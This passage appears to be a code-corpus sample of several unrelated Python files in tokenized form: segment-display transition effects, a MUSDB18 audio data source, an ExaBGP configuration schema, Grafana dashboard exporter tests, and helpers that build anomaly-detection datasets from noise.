self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>1<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end><return>SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<block_end><block_end><class_stmt>PushTransition(TransitionBase)<block_start>"""Segment display push transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start>temp_list=new_display_text<line_sep>temp_list.extend(transition_text)<line_sep>temp_list.extend(current_display_text)<line_sep><return>temp_list[self.output_length+len(self.text)-(step+1):2<times>self.output_length+len(self.text)-(step+1)]<block_end><if_stmt>self.direction<eq>'left'<block_start>temp_list=current_display_text<line_sep>temp_list.extend(transition_text)<line_sep>temp_list.extend(new_display_text)<line_sep><return>temp_list[step+1:step+1+self.output_length]<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>CoverTransition(TransitionBase)<block_start>"""Segment display cover transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start>new_extended_display_text=new_display_text<line_sep>new_extended_display_text.extend(transition_text)<if_stmt>step<l>self.output_length<block_start>temp_text=new_extended_display_text[-(step+1):]<line_sep>temp_text.extend(current_display_text[step+1:])<block_end><else_stmt><block_start>temp_text=new_display_text[-(step+1):-(step+1)+self.output_length]<block_end><return>temp_text<block_end><if_stmt>self.direction<eq>'left'<block_start>new_extended_display_text=transition_text<line_sep>new_extended_display_text.extend(new_display_text)<if_stmt>step<l>self.output_length<block_start>temp_text=current_display_text[:self.output_length-(step+1)]<line_sep>temp_text.extend(new_extended_display_text[:step+1])<block_end><else_stmt><block_start>temp_text=new_extended_display_text[step-self.output_length+1:step+1]<block_end><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>UncoverTransition(TransitionBase)<block_start>"""Segment display uncover transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start>current_extended_display_text=transition_text<line_sep>current_extended_display_text.extend(current_display_text)<if_stmt>step<l>len(self.text)<block_start>temp_text=current_extended_display_text[len(self.text)-step-1:len(self.text)-step-1+self.output_length]<block_end><else_stmt><block_start>temp_text=new_display_text[:step-len(self.text)+1]<line_sep>temp_text.extend(current_extended_display_text[:self.output_length-len(temp_text)])<block_end><return>temp_text<block_end><if_stmt>self.direction<eq>'left'<block_start>current_extended_display_text=current_display_text<line_sep>current_extended_display_text.extend(transition_text)<if_stmt>step<l>len(self.text)<block_start>temp_text=current_extended_display_text[step+1:step+1+self.output_length]<block_end><else_stmt><block_start>temp_text=current_display_text[step+1:]<line_sep>temp_text.extend(new_display_text[-(self.output_length-len(temp_text)):])<block_end><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>WipeTransition(TransitionBase)<block_start>"""Segment display wipe transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='right'<line_sep>self.text=<none><line_sep>self.text_color=<none><line_sep>super().__init__(output_length collapse_dots collapse_commas config)<if_stmt>self.text<is><none><block_start>self.text=''<block_end><block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>self.output_length+len(self.text)<block_end># pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.text<block_start><if_stmt>new_colors<and><not>self.text_color<block_start>text_color=[new_colors[0]]<block_end><else_stmt><block_start>text_color=self.text_color<block_end>transition_text=SegmentDisplayText.from_str(self.text len(self.text) self.collapse_dots self.collapse_commas text_color)<block_end><else_stmt><block_start>transition_text=UncoloredSegmentDisplayText([] self.collapse_dots self.collapse_commas)<block_end><if_stmt>self.direction<eq>'right'<block_start><if_stmt>step<l>len(self.text)<block_start>temp_text=transition_text[-(step+1):]<line_sep>temp_text.extend(current_display_text[step+1:])<block_end><elif_stmt>step<l>self.output_length<block_start>temp_text=new_display_text[:step-len(self.text)+1]<line_sep>temp_text.extend(transition_text)<line_sep>temp_text.extend(current_display_text[len(temp_text):])<block_end><else_stmt><block_start>temp_text=new_display_text[:step-len(self.text)+1]<line_sep>temp_text.extend(transition_text[:self.output_length-len(temp_text)])<block_end><return>temp_text<block_end><if_stmt>self.direction<eq>'left'<block_start><if_stmt>step<l>len(self.text)<block_start>temp_text=current_display_text[:self.output_length-(step+1)]<line_sep>temp_text.extend(transition_text[:step+1])<block_end><elif_stmt>step<l>self.output_length<block_start>temp_text=current_display_text[:self.output_length-(step+1)]<line_sep>temp_text.extend(transition_text)<line_sep>temp_text.extend(new_display_text[len(temp_text):])<block_end><elif_stmt>step<l>self.output_length+len(self.text)-1<block_start>temp_text=transition_text[step-(self.output_length+len(self.text))+1:]<line_sep>temp_text.extend(new_display_text[-(self.output_length-len(temp_text)):])<block_end><else_stmt><block_start>temp_text=new_display_text<block_end><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><block_end><class_stmt>SplitTransition(TransitionBase)<block_start>"""Segment display split transition effect."""<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Class initializer."""<line_sep>self.direction='out'<line_sep>self.mode='push'<line_sep>super().__init__(output_length collapse_dots collapse_commas config)<block_end><def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><return>int((self.output_length+1)/2)<block_end># pylint: disable=too-many-arguments,too-many-branches,too-many-return-statements <def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<if_stmt>step<l>0<or>step<ge>self.get_step_count()<block_start><raise>AssertionError(STEP_OUT_OF_RANGE_ERROR)<block_end>current_display_text=SegmentDisplayText.from_str(current_text self.output_length self.collapse_dots self.collapse_commas current_colors)<line_sep>new_display_text=SegmentDisplayText.from_str(new_text self.output_length self.collapse_dots self.collapse_commas new_colors)<if_stmt>self.mode<eq>'push'<block_start><if_stmt>self.direction<eq>'out'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>characters=int(self.output_length/2)<line_sep>split_point=characters<if_stmt>characters<times>2<eq>self.output_length<block_start>characters<augsub>1<block_end><else_stmt><block_start>split_point<augadd>1<block_end>characters<augsub>step<line_sep>temp_text=current_display_text[split_point-characters:split_point]<line_sep>temp_text.extend(new_display_text[characters:characters+(self.output_length-2<times>characters)])<line_sep>temp_text.extend(current_display_text[split_point:split_point+characters])<line_sep><return>temp_text<block_end><if_stmt>self.direction<eq>'in'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>split_point=int(self.output_length/2)<line_sep>characters=1<if_stmt>split_point<times>2<l>self.output_length<block_start>split_point<augadd>1<block_end>characters<augadd>step<line_sep>temp_text=new_display_text[split_point-characters:split_point]<line_sep>temp_text.extend(current_display_text[characters:characters+(self.output_length-2<times>characters)])<line_sep>temp_text.extend(new_display_text[split_point:split_point+characters])<line_sep><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><if_stmt>self.mode<eq>'wipe'<block_start><if_stmt>self.direction<eq>'out'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>characters=int(self.output_length/2)<if_stmt>characters<times>2<eq>self.output_length<block_start>characters<augsub>1<block_end>characters<augsub>step<line_sep>temp_text=current_display_text[:characters]<line_sep>temp_text.extend(new_display_text[characters:characters+(self.output_length-2<times>characters)])<line_sep>temp_text.extend(current_display_text[-characters:])<line_sep><return>temp_text<block_end><if_stmt>self.direction<eq>'in'<block_start><if_stmt>step<eq>self.get_step_count()-1<block_start><return>new_display_text<block_end>temp_text=new_display_text[:step+1]<line_sep>temp_text.extend(current_display_text[step+1:step+1+(self.output_length-2<times>len(temp_text))])<line_sep>temp_text.extend(new_display_text[-(step+1):])<line_sep><return>temp_text<block_end><raise>AssertionError(TRANSITION_DIRECTION_UNKNOWN_ERROR)<block_end><raise>AssertionError("Transition uses an unknown mode value")<block_end><block_end>
# Copyright 2021 Sony Group Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ''' MUSDB18 data-iterator code for MSS. '''<import_stmt>random<import_stmt>numpy<as>np<import_stmt>musdb<import_from_stmt>nnabla.utils.data_source DataSource<class_stmt>Compose()<block_start>"""Composes several augmentation transforms. Args: augmentations: list of augmentations to compose. """<def_stmt>__init__ self transforms<block_start>self.transforms=transforms<block_end><def_stmt>__call__ self audio<block_start><for_stmt>t self.transforms<block_start>audio=t(audio)<block_end><return>audio<block_end><block_end><def_stmt>_augment_gain audio low=0.75 high=1.25<block_start>"""Applies a random gain between `low` and `high`"""<line_sep>g=random.uniform(low high)<line_sep><return>audio<times>g<block_end><def_stmt>_augment_channelswap audio<block_start>"""Swap channels of stereo signals with a probability of p=0.5"""<if_stmt>audio.shape[0]<eq>2<and>random.random()<l>0.5<block_start><return>np.flip(audio 0)<block_end><else_stmt><block_start><return>audio<block_end><block_end><def_stmt>load_datasources parser args<block_start>"""Loads the specified dataset from commandline arguments Returns: train_dataset, validation_dataset """<line_sep>parser.add_argument('--is-wav' action='store_true' default=<true> help='loads wav instead of STEMS')<line_sep>parser.add_argument('--samples-per-track' type=int default=64)<line_sep>parser.add_argument('--source-augmentations' type=str nargs='+' default=['gain' 'channelswap'])<line_sep>args=parser.parse_args()<line_sep>source_augmentations=Compose([globals()['_augment_'+aug]<for>aug args.source_augmentations])<line_sep>train_dataset=MUSDBDataSource(source_augmentations=source_augmentations random_track_mix=<true> args=args)<line_sep><return>train_dataset args<block_end><class_stmt>MUSDBDataSource(DataSource)<block_start><def_stmt>__init__ self args download=<false> samples_per_track=64 source_augmentations=<lambda>audio:audio random_track_mix=<false> dtype=np.float32 seed=42 rng=<none><block_start>""" MUSDB18 nnabla.utils.data_source that samples from the MUSDB tracks using track and excerpts with replacement. Parameters ---------- args : additional arguments used to add further control for the musdb dataset initialization function. download : boolean automatically download 7s preview version of MUS samples_per_track : int sets the number of samples, yielded from each track per epoch. Defaults to 64 source_augmentations : list[callables] provide list of augmentation function that take a multi-channel audio file of shape (src, samples) as input and output. Defaults to no-augmentations (input = output) random_track_mix : boolean randomly mixes sources from different tracks to assemble a custom mix. This augmenation is only applied for the train subset. seed : int control randomness of dataset iterations dtype : numeric type data type of torch output tuple x and y """<line_sep>super(MUSDBDataSource self).__init__(shuffle=<true>)<if_stmt>rng<is><none><block_start>rng=np.random.RandomState(seed)<block_end>self.rng=rng<line_sep>random.seed(seed)<line_sep>self.args=args<line_sep>self.download=args.root<is><none><line_sep>self.samples_per_track=samples_per_track<line_sep>self.source_augmentations=source_augmentations<line_sep>self.random_track_mix=random_track_mix<line_sep>self.mus=musdb.DB(root=args.root is_wav=args.is_wav split=<none> subsets='train' download=download)<line_sep>print(f"Finished loading dataset with {len(self.mus.tracks)} tracks.")<line_sep>self.sample_rate=44100# musdb has fixed sample rate self.dtype=dtype<line_sep>self._size=len(self.mus.tracks)<times>self.samples_per_track<line_sep>self._variables=('mixture' 'target')<line_sep>self.reset()<block_end><def_stmt>_get_data self position<block_start>index=self._indexes[position]<line_sep>audio_sources=[]<line_sep>target_ind=<none><line_sep># select track track=self.mus.tracks[index<floordiv>self.samples_per_track]<line_sep># at training time we assemble a custom mix <if_stmt>self.args.seq_dur<block_start><for_stmt>k,source enumerate(self.mus.setup['sources'])# memorize index of target source <block_start><if_stmt>source<eq>self.args.target<block_start>target_ind=k<block_end># select a random track <if_stmt>self.random_track_mix<block_start>track=random.choice(self.mus.tracks)<block_end># set the excerpt duration track.chunk_duration=self.args.seq_dur<line_sep># set random start index track.chunk_start=random.uniform(0 track.duration-self.args.seq_dur)<line_sep># load source audio and apply time domain source_augmentations audio=track.sources[source].audio.T<line_sep>audio=self.source_augmentations(audio)<line_sep>audio_sources.append(audio)<block_end># create stem tensor of shape (source, channel, samples) stems=np.stack(audio_sources axis=0)<line_sep># # apply linear mix over source index=0 x=np.sum(stems axis=0)<line_sep># get the target stem <if_stmt>target_ind<is><not><none><block_start>y=stems[target_ind]<block_end># assuming vocal/accompaniment scenario if target!=source <else_stmt><block_start>vocind=list(self.mus.setup['sources'].keys()).index('vocals')<line_sep># apply time domain subtraction y=x-stems[vocind]<block_end><block_end># for validation and test, we deterministically yield the full musdb track <else_stmt># get the non-linear source mix straight from musdb <block_start>x=track.audio.T<line_sep>y=track.targets[self.args.target].audio.T<block_end><return>x y<block_end><def_stmt>reset self<block_start><if_stmt>self._shuffle<block_start>self._indexes=self.rng.permutation(self._size)<block_end><else_stmt><block_start>self._indexes=np.arange(self._size)<block_end>super(MUSDBDataSource self).reset()<block_end><block_end>
# encoding: utf-8 """ setup.py Created by <NAME> on 2014-12-23. Copyright (c) 2014-2017 Exa Networks. All rights reserved. License: 3-clause BSD. (See the COPYRIGHT file) """<import_from_stmt>exabgp.environment parsing<import_from_stmt>exabgp.environment.environment Env<line_sep>_SPACE={'space':' '<times>33}<line_sep>LOGGING_HELP_STDOUT=("""\ where logging should log %(space)s syslog (or no setting) sends the data to the local syslog syslog %(space)s host:<location> sends the data to a remote syslog server %(space)s stdout sends the data to stdout %(space)s stderr sends the data to stderr %(space)s <filename> send the data to a file"""%_SPACE)<line_sep>CONFIGURATION={'profile':{'enable':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'toggle profiling of the code' } 'file':{'read':parsing.unquote 'write':parsing.quote 'value':'' 'help':'profiling result file, none means stdout, no overwriting' } } 'pdb':{'enable':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'on program fault, start pdb the python interactive debugger' }} 'daemon':{'pid':{'read':parsing.unquote 'write':parsing.quote 'value':'' 'help':'where to save the pid if we manage it' } 'user':{'read':parsing.user 'write':parsing.quote 'value':'nobody' 'help':'user to run the program as' } 'daemonize':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'should we run in the background' } 'drop':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'drop privileges before forking processes' } 'umask':{'read':parsing.umask_read 'write':parsing.umask_write 'value':'0137' 'help':'run daemon with this umask, governs perms of logfiles etc.' } } 'log':{'enable':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'enable logging to file or syslog' } 'level':{'read':parsing.syslog_value 'write':parsing.syslog_name 'value':'INFO' 'help':'log message with at least the priority SYSLOG.<level>' } 'destination':{'read':parsing.unquote 'write':parsing.quote 'value':'stdout' 'help':LOGGING_HELP_STDOUT } 'all':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report debug information for everything' } 'configuration':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'report command parsing' } 'reactor':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'report signal received, command reload' } 'daemon':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'report pid change, forking, ...' } 'processes':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'report handling of forked processes' } 'network':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'report networking information (TCP/IP, network state,...)' } 'packets':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report BGP packets sent and received' } 'rib':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report change in locally configured routes' } 'message':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report changes in route announcement on config reload' } 'timers':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report keepalives timers' } 'routes':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report received routes' } 'parser':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'report BGP message parsing details' } 'short':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'use short log format (not prepended with time,level,pid and source)' } } 'tcp':{'once':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'only one tcp connection attempt per peer (for debuging scripts)' } 'delay':{'read':parsing.integer 'write':parsing.nop 'value':'0' 'help':'start to announce route when the minutes in the hours is a modulo of this number' } 'bind':{'read':parsing.ip_list 'write':parsing.quote_list 'value':'' 'help':'Space separated list of IPs to bind on when listening (no ip to disable)' } 'port':{'read':parsing.integer 'write':parsing.nop 'value':'179' 'help':'port to bind on when listening' } 'acl':{'read':parsing.boolean 'write':parsing.lower 'value':'' 'help':'(experimental please do not use) unimplemented' } } 'bgp':{'passive':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'ignore the peer configuration and make all peers passive' } 'openwait':{'read':parsing.integer 'write':parsing.nop 'value':'60' 'help':'how many seconds we wait for an open once the TCP session is established' } } 'cache':{'attributes':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'cache all attributes (configuration and wire) for faster parsing' } 'nexthops':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'cache routes next-hops (deprecated: next-hops are always cached)' } } 'api':{'ack':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'acknowledge api command(s) and report issues' } 'chunk':{'read':parsing.integer 'write':parsing.nop 'value':'1' 'help':'maximum lines to print before yielding in show routes api' } 'encoder':{'read':parsing.api 'write':parsing.lower 'value':'json' 'help':'(experimental) default encoder to use with with external API (text or json)' } 'compact':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'shorter JSON encoding for IPv4/IPv6 Unicast NLRI' } 'respawn':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'should we try to respawn helper processes if they dies' } 'terminate':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'should we terminate ExaBGP if any helper process dies' } 'cli':{'read':parsing.boolean 'write':parsing.lower 'value':'true' 'help':'should we create a named pipe for the cli' } 'pipename':{'read':parsing.unquote 'write':parsing.quote 'value':'exabgp' 'help':'name to be used for the exabgp pipe' } } 'reactor':{'speed':{'read':parsing.real 'write':parsing.nop 'value':'1.0' 'help':'reactor loop time\n%(space)s use only if you understand the code.'%_SPACE } } # Here for internal use 'debug':{'pdb':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'enable python debugger on errors' } 'memory':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'command line option --memory' } 'configuration':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'undocumented option: raise when parsing configuration errors' } 'selfcheck':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'does a self check on the configuration file' } 'route':{'read':parsing.unquote 'write':parsing.quote 'value':'' 'help':'decode the route using the configuration' } 'defensive':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'generate random fault in the code in purpose' } 'rotate':{'read':parsing.boolean 'write':parsing.lower 'value':'false' 'help':'rotate configurations file on reload (signal)' } } }<line_sep># load the environment Env.setup(CONFIGURATION)<line_sep>
# -*- coding: utf-8 -*- # Copyright 2015-2019 grafana-dashboard-builder contributors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> unicode_literals<import_stmt>pytest<import_from_stmt>mock patch MagicMock<import_from_stmt>grafana_dashboards.exporter ProjectProcessor FileExporter<line_sep>__author__='<NAME> <<EMAIL>>'<def_stmt>test_project_processor <block_start>dashboard_processor=MagicMock()<line_sep>processor=ProjectProcessor([dashboard_processor])<line_sep>project=MagicMock()<line_sep>context=MagicMock()<line_sep>dashboard=MagicMock()<line_sep>project.get_contexts.return_value=[context]<line_sep>project.get_dashboards.return_value=[dashboard]<line_sep>parent_context=MagicMock()<line_sep># noinspection PyTypeChecker processor.process_projects([project] parent_context)<line_sep>project.get_contexts.assert_called_once_with(parent_context)<line_sep>dashboard.gen_json.assert_called_with(context)<line_sep>context.expand_placeholders.assert_called_with(dashboard.name)<line_sep>dashboard_processor.process_dashboard.assert_called_once_with(project.name context.expand_placeholders() dashboard.gen_json())<block_end>@patch('grafana_dashboards.exporter.open' create=<true>)@patch('json.dump')@patch('os.makedirs' return_value=<true>)@patch('os.path.isdir' return_value=<true>)@patch('os.path.exists' return_value=<true>)<def_stmt>test_file_exporter patch_exists path_isdir makedirs json_dump mock_file<block_start>exporter=FileExporter('output_folder')<line_sep>dashboard_data={'some_key':'some_value'}<line_sep>exporter.process_dashboard('project_name' 'dashboard_name' dashboard_data)<line_sep>json_dump.assert_called_once_with(dashboard_data mock_file().__enter__() sort_keys=<true> indent=2 separators=(',' ': '))<block_end>@patch('os.makedirs' side_effect=[<true> OSError('testing')])@patch('os.path.isdir' return_value=<true>)@patch('os.path.exists' return_value=<false>)<def_stmt>test_file_exporter_path_not_exist patch_exists path_isdir makedirs<block_start>exporter=FileExporter('output_folder')<line_sep>dashboard_data={'some_key':'some_value'}<with_stmt>pytest.raises(Exception)<as>e<block_start>exporter.process_dashboard('project_name' 'dashboard_name' dashboard_data)<block_end><assert_stmt>'testing'<in>str(e.value)<block_end>@patch('os.makedirs' return_value=<true>)@patch('os.path.isdir' return_value=<false>)@patch('os.path.exists' return_value=<false>)<def_stmt>test_file_exporter_output_not_dir patch_exists path_isdir makedirs<block_start><with_stmt>pytest.raises(Exception)<as>e<block_start>FileExporter('output_folder')<block_end><assert_stmt>"'output_folder' must be a directory"<in>str(e.value)<block_end>
<import_from_stmt>typing List<import_stmt>torch<import_from_stmt>torch.utils.data.dataset Dataset<def_stmt>noise outlier_classes:List[int] generated_noise:torch.Tensor norm:torch.Tensor nom_class:int train_set:Dataset gt:bool=<false><arrow>Dataset<block_start>""" Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies. :param outlier_classes: a list of all outlier class indices. :param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w). :param norm: torch tensor of nominal images (n x c x h x w). :param nom_class: the index of the class that is considered nominal. :param train_set: some training dataset. :param gt: whether to provide ground-truth maps as well, atm not available! :return: a modified dataset, with training data consisting of nominal samples and artificial anomalies. """<if_stmt>gt<block_start><raise>ValueError('No GT mode for pure noise available!')<block_end>anom=generated_noise.clamp(0 255).byte()<line_sep>data=torch.cat((norm anom))<line_sep>targets=torch.cat((torch.ones(norm.size(0))<times>nom_class torch.ones(anom.size(0))<times>outlier_classes[0]))<line_sep>train_set.data=data<line_sep>train_set.targets=targets<line_sep><return>train_set<block_end><def_stmt>malformed_normal outlier_classes:List[int] generated_noise:torch.Tensor norm:torch.Tensor nom_class:int train_set:Dataset gt:bool=<false> brightness_threshold:float=0.11<times>255<arrow>Dataset<block_start>""" Creates a dataset based on the nominal classes of a given dataset and generated noise anomalies. Unlike above, the noise images are not directly utilized as anomalies, but added to nominal samples to create malformed normal anomalies. :param outlier_classes: a list of all outlier class indices. :param generated_noise: torch tensor of noise images (might also be Outlier Exposure based noise) (n x c x h x w). :param norm: torch tensor of nominal images (n x c x h x w). :param nom_class: the index of the class that is considered nominal. :param train_set: some training dataset. :param gt: whether to provide ground-truth maps as well. :param brightness_threshold: if the average brightness (averaged over color channels) of a pixel exceeds this threshold, the noise image's pixel value is subtracted instead of added. This avoids adding brightness values to bright pixels, where approximately no effect is achieved at all. :return: a modified dataset, with training data consisting of nominal samples and artificial anomalies. """<assert_stmt>(norm.dim()<eq>4<or>norm.dim()<eq>3)<and>generated_noise.shape<eq>norm.shape<line_sep>norm_dim=norm.dim()<if_stmt>norm_dim<eq>3<block_start>norm,generated_noise=norm.unsqueeze(1) generated_noise.unsqueeze(1)# assuming ch dim is skipped <block_end>anom=norm.clone()<line_sep># invert noise for bright regions (bright regions are considered being on average > brightness_threshold) generated_noise=generated_noise.int()<line_sep>bright_regions=norm.sum(1)<g>brightness_threshold<times>norm.shape[1]<for_stmt>ch range(norm.shape[1])<block_start>gnch=generated_noise[: ch]<line_sep>gnch[bright_regions]=gnch[bright_regions]<times>-1<line_sep>generated_noise[: ch]=gnch<block_end>anom=(anom.int()+generated_noise).clamp(0 255).byte()<line_sep>data=torch.cat((norm anom))<line_sep>targets=torch.cat((torch.ones(norm.size(0))<times>nom_class 